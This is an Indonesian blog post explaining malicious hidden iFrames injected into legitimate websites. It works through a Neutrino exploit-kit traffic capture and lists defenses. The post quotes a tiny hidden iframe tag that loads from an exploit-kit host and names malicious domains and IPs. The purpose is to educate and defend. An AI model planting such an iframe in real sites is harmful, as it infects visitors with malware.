Little boy questioned his mother, he asked what he can be in the future..with a sad smile, she tells him he can be anything he wants to be.... Boy said he’d become (an) astronaut and fly out into space crews around the universe he wanted to see the stars and also see other planets in outer space------------- "Why don’t we just keep dreaming, let’s keep our mind with dream and faith, as long as we wish we can make it come true, how old you are never forget your dream and keep dreaming "

Tuesday, 15 May 2018

Malicious iFrame (Inline Frames Berbahaya)

Di Internet saat ini, beberapa ancaman berbasis web yang paling canggih dan dirancang untuk bersembunyi di depan mata pada situs situs web yang sah. Sebagian besar malware web terdiri dari skrip kode jahat (malicious script) yang tersembunyi di dalam inline frames, atau disebut dengan iFrames. 

IFrame adalah elemen HTML yang memungkinkan pengembang situs web memuat halaman web lain. Elemen HTML iFrame sering digunakan untuk memasukkan konten seperti iklan dari sumber lain ke halaman web tsb.

Menyisipkan iFrame HTML yang berbahaya ke dalam situs web yang sah telah menjadi vektor serangan umum yang digunakan dalam serangan berbasis web. Terkadang, tidak hanya halaman situs web yang sah yang terinfeksi, tetapi semua halaman lain di situs web juga dapat terinfeksi. Ini dapat menunjukkan bahwa penyerang menggunakan injeksi SQL untuk menyuntikkan iFrame jahat ke dalam database backend dari mana laman web dibuat secara dinamis. Serangan injeksi SQL artikel sebelunya  "SQL Injection (Injeksi SQL)"

Sekarang cara ini menjadi populer dengan maksud untuk mencoba memuat malware ke PC pengguna tanpa mereka pergi ke situs web jahat atau situs web yang disusupi. Bahkan, mereka hanya perlu mengklik tautan di pencarian Google untuk situs populer, di mana exploit telah dimuat. Situs yang terpengaruh termasuk USA Today, Wal-Mart, dan ZD Net Asia, tetapi menyebar.

Halaman web jahat yang dimuat menggunakan iFrame dapat dibuat tidak terlihat dengan hanya menampilkan beberapa piksel (bisa hanya satu piksel) sehingga korban tidak dapat melihat bahwa terdapat elemen iFrame disana. Laman web jahat dapat digunakan untuk mengirimkan eksploit yang akan berjalan secara otomatis ke komputer korban.

Dalam screenshot Wireshark di bawah ini, paket HTTP antara ip address 31.22.4.108 (situs web yang disusupi 30oct2007.com) dan 192.168.204.162 (host korban) berisi iFrame dengan : 
<iframe src = 'http: //eesheshi.ontowess.com: 8000 / fdoufeipqrxkf? Zxchqtevykm = 2404448 'style =' width: 10px; tinggi: 10px; ' frameborder = 'no'> </ iframe> 
sebagai sumber iFrame.
Dalam contoh ini, malware tersebut adalah perangkat eksploitasi "Neutrino yang dikirim dari host yang disusupi 212.83.135.167 eesheshi.ontowess.com ke host korban 192.168.204.162.

 Gambar di bawah ini menunjukkan contoh penggunaan salah tools scanning keamanan online gratis untuk mengidentifikasi situs eesheshi.ontowess.com sebagai kemungkinan jika situs telah disusupi dan masuk daftar hitam.
Exploit kit Neutrino menginfeksi host korban (192.168.204.162), host korban (192.168.204.162) kemudian memulai komunikasi dengan host 89.191.150.230 www.gimalubiewo.pl yang bertindak sebagai server CnC (command and control) seperti yang ditunjukkan pada screenshot Wireshark di bawah ini.
Gambar di bawah ini menunjukkan contoh penggunaan layanan DNS seperti Cisco OpenDNS untuk mengidentifikasi domain gimalubiewo.pl yang dikategorikan sebagai Malware.
Gambar di bawah ini menunjukkan contoh penggunaan salah satu tol keamanan online gratis untuk mengidentifikasi subdomain www.gimalubiewo.pl sebagai kategori berbahaya. URL http://gminalubiewo.pl/images/files/file.php, yang cocok dengan aktivitas HTTP GET dari screenshot Wireshark yang ditampilkan sebelumnya, juga diidentifikasi sebagai berbahaya.

Penanggulangan hingga iFrames yang berbahaya termasuk yang berikut:

  • Pengembang web tidak menggunakan iFrames untuk ditanamkan pada halama web nya, dan mengisolasi konten pihak ketiga dari situs web mereka (iklan dan konten lainnya). Penyerang sering mengimplementasikan serangan iFrame dengan hanya mengubah sumber iFrame di situs web yang disusupi (memodifikasi iFrame sah yang telah ada sebelumnya).
  • Menggunakan layanan seperti Cisco OpenDNS untuk memblokir pengguna agar tidak mengakses situs web jahat.
  • Terapkan solusi keamanan proxy web, seperti Cisco Web Security Appliance atau Cisco Cloud Web Security, untuk memblokir pengguna agar tidak mengakses situs web jahat.
  • Mendidik pengguna akhir (end users), iFrames HTML berbahaya yang disuntikan ke situs web yang sah telah menjadi vektor serangan umum dalam serangan berbasis web.
Sumber : SECFNS Section 7, the Guardian
Diposkan oleh pada
Label: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)